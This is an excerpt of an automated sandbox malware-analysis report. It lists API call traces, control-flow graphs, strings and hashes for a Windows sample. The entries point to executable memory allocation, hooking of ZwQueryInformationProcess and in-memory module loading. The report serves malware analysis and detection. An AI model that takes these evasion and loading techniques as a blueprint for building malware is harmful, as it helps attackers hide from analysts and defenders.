                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID:
                                                                                  • API String ID: 4237864984-0
                                                                                  • Opcode ID: 9afa501fba7988bbc51a9d23f1a0abce0e230cb407ae35beeac04adf8d3fcdb9
                                                                                  • Instruction ID: 5e3602541a990c6dca23ae760bb8d465da58fae656e24a2382b44c06c340b680
                                                                                  • Opcode Fuzzy Hash: 9afa501fba7988bbc51a9d23f1a0abce0e230cb407ae35beeac04adf8d3fcdb9
                                                                                  • Instruction Fuzzy Hash: 01A12736A041458FCF19AF69DC51BEE7BA1AB06324F14015EEC11AB3D1DB388D93CB59

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • strncmp.NTDLL ref: 7FE4180B
                                                                                  • malloc.MSVCRT ref: 7FE4186C
                                                                                  • memcpy.NTDLL(00000008,?,?), ref: 7FE41889
                                                                                  • free.MSVCRT ref: 7FE418FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: freelstrlenmallocmemcpystrncmp
                                                                                  • String ID: /etc/plugins.plist$MZ$x86
                                                                                  • API String ID: 3682158708-1713858012
                                                                                  • Opcode ID: 54bb9ffcdce75293fdea451ea1764c5140780be0e9db6a82e14bb8dd9a51f797
                                                                                  • Instruction ID: 957808bbf470da9d99de4376462d0edb45fc24e4bfde69fd6e974ca862a0dbb1
                                                                                  • Opcode Fuzzy Hash: 54bb9ffcdce75293fdea451ea1764c5140780be0e9db6a82e14bb8dd9a51f797
                                                                                  • Instruction Fuzzy Hash: BA510A76D012199FCF01CFE4D9849EEB7B9FF48228F24556EE916B7200E734AA45CB60

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: callocfreemallocmemcpy
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 861552148-1352728671
                                                                                  • Opcode ID: c9b9c47c16ca03e766a67db26b61f7cbb891e1b8cbf3b34d4765739f8dd69da7
                                                                                  • Instruction ID: 604d0970c97af9f6bca1788cb46740802a4dd3dc1fb44fca78aaa917fe2bbe24
                                                                                  • Opcode Fuzzy Hash: c9b9c47c16ca03e766a67db26b61f7cbb891e1b8cbf3b34d4765739f8dd69da7
                                                                                  • Instruction Fuzzy Hash: 7A316C729087519AE721CE29E850672BFEADFC1315F14C85EF0BFC6442D778E1498722
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00580391
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040), ref: 005804A1
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0058050B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704912105.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_580000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 3668210933-1352728671
                                                                                  • Opcode ID: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction ID: e6d5ac0a6d799273b3a951926eb1be7afac1fc250644e59c7843b58b8bf69cc1
                                                                                  • Opcode Fuzzy Hash: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction Fuzzy Hash: 62916C71D00619ABDFA0EF95C884BAEBBB4BF44304F049559ED59BB281D374E948CFA0
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(7FE31BB3,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31D8C
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31DA1
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E42
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E4E
                                                                                    • Part of subcall function 7FE31EEA: memcmp.MSVCRT(7FE31BB3,7FE31E6D,7FE31E6D,7FE31BB3,?,00000080,?,7FE31E6D,7FE31BB3,7FE31BB3,00000080,?,?,?,00000000), ref: 7FE31F0D
                                                                                  • memcpy.MSVCRT(7FE31BB3,7FE31BB3,?,?,?,00001000,00000040,00000004,?,?,?,?,?,?,00000000), ref: 7FE31EA2
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll), ref: 7FE31EDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadmemcpy$HandleVirtual$AllocCloseCreateCurrentEnvironmentExpandFreeModuleProcessSizeStringsfreemallocmemcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1807237107-0
                                                                                  • Opcode ID: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction ID: e66e30e26c8d651dff7f802cc7b867a7bcfc757d2cd4cd66e8dd7680ebece615
                                                                                  • Opcode Fuzzy Hash: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction Fuzzy Hash: 32416275D00209EFDF019FA6CD88AAEBBBAFF44364F54412EE902E7150E735A954CB60

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 361 7fe41ef2-7fe41f08 GetProcAddress 362 7fe41f0a-7fe41f0f 361->362 363 7fe41f6b-7fe41f6f 361->363 362->363 364 7fe41f11-7fe41f2c call 7fe41f70 362->364 364->363 367 7fe41f2e-7fe41f31 364->367 367->363 368 7fe41f33-7fe41f4c VirtualProtect 367->368 368->363 369 7fe41f4e-7fe41f69 InterlockedExchange VirtualProtect 368->369 369->363
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 7FE41F00
                                                                                  • VirtualProtect.KERNELBASE(00000001,00000004,00000040,?,7FE41EA9,00000000,?,?,?,?), ref: 7FE41F48
                                                                                  • InterlockedExchange.KERNEL32(?,7FE41EA4), ref: 7FE41F57
                                                                                  • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 7FE41F69
                                                                                  Strings
                                                                                  • ZwQueryInformationProcess, xrefs: 7FE41EF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressExchangeInterlockedProc
                                                                                  • String ID: ZwQueryInformationProcess
                                                                                  • API String ID: 1726986358-1584433389
                                                                                  • Opcode ID: cca9fdba920f07e8de881a81ace27208a19ae97a59725a68c8e7acdeb786ef06
                                                                                  • Instruction ID: 9d314fcda45d8e175856064bc7b8333d7a3f38f698c62f2d4cac807126b7cea3
                                                                                  • Opcode Fuzzy Hash: cca9fdba920f07e8de881a81ace27208a19ae97a59725a68c8e7acdeb786ef06
                                                                                  • Instruction Fuzzy Hash: 4F015B3630020ABBDF024EA1DD45FEA3F7AEF856E4F140129FE099A090D731E5668B94

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 370 7fe41e0e-7fe41e34 GetModuleHandleA GetProcAddress 371 7fe41e36-7fe41e60 call 7fe41eb3 370->371 372 7fe41eac-7fe41eb0 370->372 371->372 375 7fe41e62-7fe41e65 371->375 375->372 376 7fe41e67-7fe41e76 call 7fe411b0 375->376 379 7fe41e7d-7fe41e7f 376->379 380 7fe41e78-7fe41e7b 376->380 379->375 380->379 381 7fe41e81-7fe41e99 call 7fe41eb3 380->381 381->372 384 7fe41e9b-7fe41ea4 call 7fe41ef2 381->384 386 7fe41ea9 384->386 386->372
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE41E1C
                                                                                  • GetProcAddress.KERNEL32(00000000,KiUserExceptionDispatcher), ref: 7FE41E2A
                                                                                    • Part of subcall function 7FE411B0: memset.NTDLL ref: 7FE411D2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcmemset
                                                                                  • String ID: KiUserExceptionDispatcher$ntdll.dll
                                                                                  • API String ID: 3137504439-391726712
                                                                                  • Opcode ID: 11d2593c27cc74ef7a9c2590feb6ed6d42a7dd48463c0d874392180369953c0b
                                                                                  • Instruction ID: bf9c5516763da571611dd8505f09cccef45188715b9c227fe0ff8b64459f62f7
                                                                                  • Opcode Fuzzy Hash: 11d2593c27cc74ef7a9c2590feb6ed6d42a7dd48463c0d874392180369953c0b
                                                                                  • Instruction Fuzzy Hash: EA11B97AD01306BBCF129B66AC80CBFBB7DFF85264B21165EF90597101E734E55187A0

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 387 7fe4344e-7fe4345f lstrcmpiA 388 7fe43461-7fe43468 387->388 389 7fe43469-7fe43473 LoadLibraryA 387->389
                                                                                  APIs
                                                                                  • lstrcmpiA.KERNEL32(?,psdk.dll), ref: 7FE43457
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 7FE4346D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadlstrcmpi
                                                                                  • String ID: psdk.dll
                                                                                  • API String ID: 2835099494-3943316854
                                                                                  • Opcode ID: 658ba54a6e6afa1ceea7d99fffde5ae9c732553f25227634ff1798c6c998681e
                                                                                  • Instruction ID: 97d830ea87723066c88d8f375328ca6ed4df18e57f180154a0a5a4c893f5857c
                                                                                  • Opcode Fuzzy Hash: 658ba54a6e6afa1ceea7d99fffde5ae9c732553f25227634ff1798c6c998681e
                                                                                  • Instruction Fuzzy Hash: F4C0C939208300ABDA024B55E908A197BA7AB80A55B54851CB84584120C330D429AB02

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 390 7fe4194a-7fe4196d call 7fe4257f 393 7fe41a53-7fe41a57 390->393 394 7fe41973-7fe41976 390->394 394->393 395 7fe4197c-7fe41982 394->395 395->393 396 7fe41988-7fe41992 call 7fe41a58 395->396 396->393 399 7fe41998-7fe419ad VirtualAlloc 396->399 399->393 400 7fe419b3-7fe419d3 memcpy 399->400 401 7fe41a05-7fe41a1d call 7fe41b03 400->401 402 7fe419d5 400->402 408 7fe41a45-7fe41a4d VirtualFree 401->408 409 7fe41a1f-7fe41a37 call 7fe41c64 401->409 403 7fe419d8-7fe419dc 402->403 405 7fe419f6-7fe41a03 403->405 406 7fe419de-7fe419f4 memcpy 403->406 405->401 405->403 406->405 408->393 409->408 412 7fe41a39-7fe41a3e 409->412 412->408 413 7fe41a40 412->413 413->408
                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040,00000000,?,?,?), ref: 7FE419A3
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE419C2
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE419EC
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 7FE41A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtualmemcpy$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 788548360-0
                                                                                  • Opcode ID: 1fba82f6f1daba72e5720242b73029a30e16bbe2dfffd2ab4a80a53515d399fc
                                                                                  • Instruction ID: d3b4805ca6afd1a5d8c4d5f4bd2ba4f5957bf034018e57e24973636439659fbd
                                                                                  • Opcode Fuzzy Hash: 1fba82f6f1daba72e5720242b73029a30e16bbe2dfffd2ab4a80a53515d399fc
                                                                                  • Instruction Fuzzy Hash: 6B31F672900304BFCF228F65ED45ABE77A9EF40369B20551EF906E3100E738E910A760

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: PathTemp
                                                                                  • String ID:
                                                                                  • API String ID: 2920410445-0
                                                                                  • Opcode ID: 99ea51cc2d78c3489aa5ba24630fdde467a1d418e431930fb195c39f02273379
                                                                                  • Instruction ID: f11b4dce29de50892480c20cbddc22f8b8c2a836f0274655df0ab0b529399c2f
                                                                                  • Opcode Fuzzy Hash: 99ea51cc2d78c3489aa5ba24630fdde467a1d418e431930fb195c39f02273379
                                                                                  • Instruction Fuzzy Hash: 0271E470E002089BEF14DBA8DE85BDEBB76EF45304F60412ED414772C2DB799989CB95

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 472 419712-41972e 473 419734-419736 472->473 474 4198ed 472->474 475 419758-419779 473->475 476 419738-41974b call 413c44 call 413c57 call 41569f 473->476 477 4198ef-4198f3 474->477 478 419780-419786 475->478 479 41977b-41977e 475->479 492 419750-419753 476->492 478->476 481 419788-41978d 478->481 479->478 479->481 484 41978f-41979b call 41f87f 481->484 485 41979e-4197af call 4192b9 481->485 484->485 493 4197b1-4197b3 485->493 494 4197f0-419802 485->494 492->477 497 4197b5-4197bd 493->497 498 4197da-4197e6 call 418ea7 493->498 495 419804-41980d 494->495 496 419849-41986b WriteFile 494->496 504 419839-419847 call 41932a 495->504 505 41980f-419812 495->505 501 419876 496->501 502 41986d-419873 GetLastError 496->502 499 4197c3-4197d0 call 419251 497->499 500 41987f-419882 497->500 508 4197eb-4197ee 498->508 515 4197d3-4197d5 499->515 510 419885-41988a 500->510 509 419879-41987e 501->509 502->501 504->508 511 419814-419817 505->511 512 419829-419837 call 4194ee 505->512 508->515 509->500 516 4198e8-4198eb 510->516 517 41988c-419891 510->517 511->510 518 419819-419827 call 419405 511->518 512->508 515->509 516->477 521 419893-419898 517->521 522 4198bd-4198c9 517->522 518->508 526 4198b1-4198b8 call 413c21 521->526 527 41989a-4198ac call 413c57 call 413c44 521->527 524 4198d0-4198e3 call 413c57 call 413c44 522->524 525 4198cb-4198ce 522->525 524->492 525->474 525->524 526->492 527->492
                                                                                  APIs
                                                                                    • Part of subcall function 00418EA7: GetConsoleCP.KERNEL32(?,00403FD0,00000000), ref: 00418EEF
                                                                                  • WriteFile.KERNELBASE(?,00000000,0042F8A8,00000000,00000000,00000000,00403FD0,00403FD0,00403FD0,00000000,?,?,00412F15,?,0042F8A8,00000010), ref: 00419863
                                                                                  • GetLastError.KERNEL32(?,00412F15,?,0042F8A8,00000010,00403FD0), ref: 0041986D
                                                                                  • __dosmaperr.LIBCMT ref: 004198B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 251514795-0
                                                                                  • Opcode ID: db2785baaafd5d33740c238dac4a58e1619d81f25d33ef0c512f06196b3c93d2
                                                                                  • Instruction ID: 9cc85a0dd55b67ab028b7af81f9f607912d675398f38ecd83fa53986d5a6a907
                                                                                  • Opcode Fuzzy Hash: db2785baaafd5d33740c238dac4a58e1619d81f25d33ef0c512f06196b3c93d2
                                                                                  • Instruction Fuzzy Hash: AE51D571A1010AABDB11AFA5C8A1BEFBBB8EF05314F140017E410B7291D678DDC2C7A9

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 539 4171a4-4171b8 call 4189ae 542 4171ba-4171bc 539->542 543 4171be-4171c6 539->543 544 41720c-41722c call 41891d 542->544 545 4171d1-4171d4 543->545 546 4171c8-4171cf 543->546 556 41723a 544->556 557 41722e-417238 call 413c21 544->557 549 4171f2-417202 call 4189ae CloseHandle 545->549 550 4171d6-4171da 545->550 546->545 548 4171dc-4171f0 call 4189ae * 2 546->548 548->542 548->549 549->542 559 417204-41720a GetLastError 549->559 550->548 550->549 561 41723c-41723f 556->561 557->561 559->544
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,00403FD0,?,004170D2,00403FD0,0042F9C8,0000000C,00417184,0042F8A8), ref: 004171FA
                                                                                  • GetLastError.KERNEL32(?,004170D2,00403FD0,0042F9C8,0000000C,00417184,0042F8A8), ref: 00417204
                                                                                  • __dosmaperr.LIBCMT ref: 0041722F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2583163307-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: nA
                                                                                  • API String ID: 269201875-513057715
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0040553E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405665
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 004059DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405B01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405C28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000), ref: 004085C5
                                                                                  • GetFileAttributesA.KERNELBASE(?), ref: 004085D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                  • String ID:
                                                                                  • API String ID: 3401506121-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_taskPathTempVersion
                                                                                  • String ID:
                                                                                  • API String ID: 623340063-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
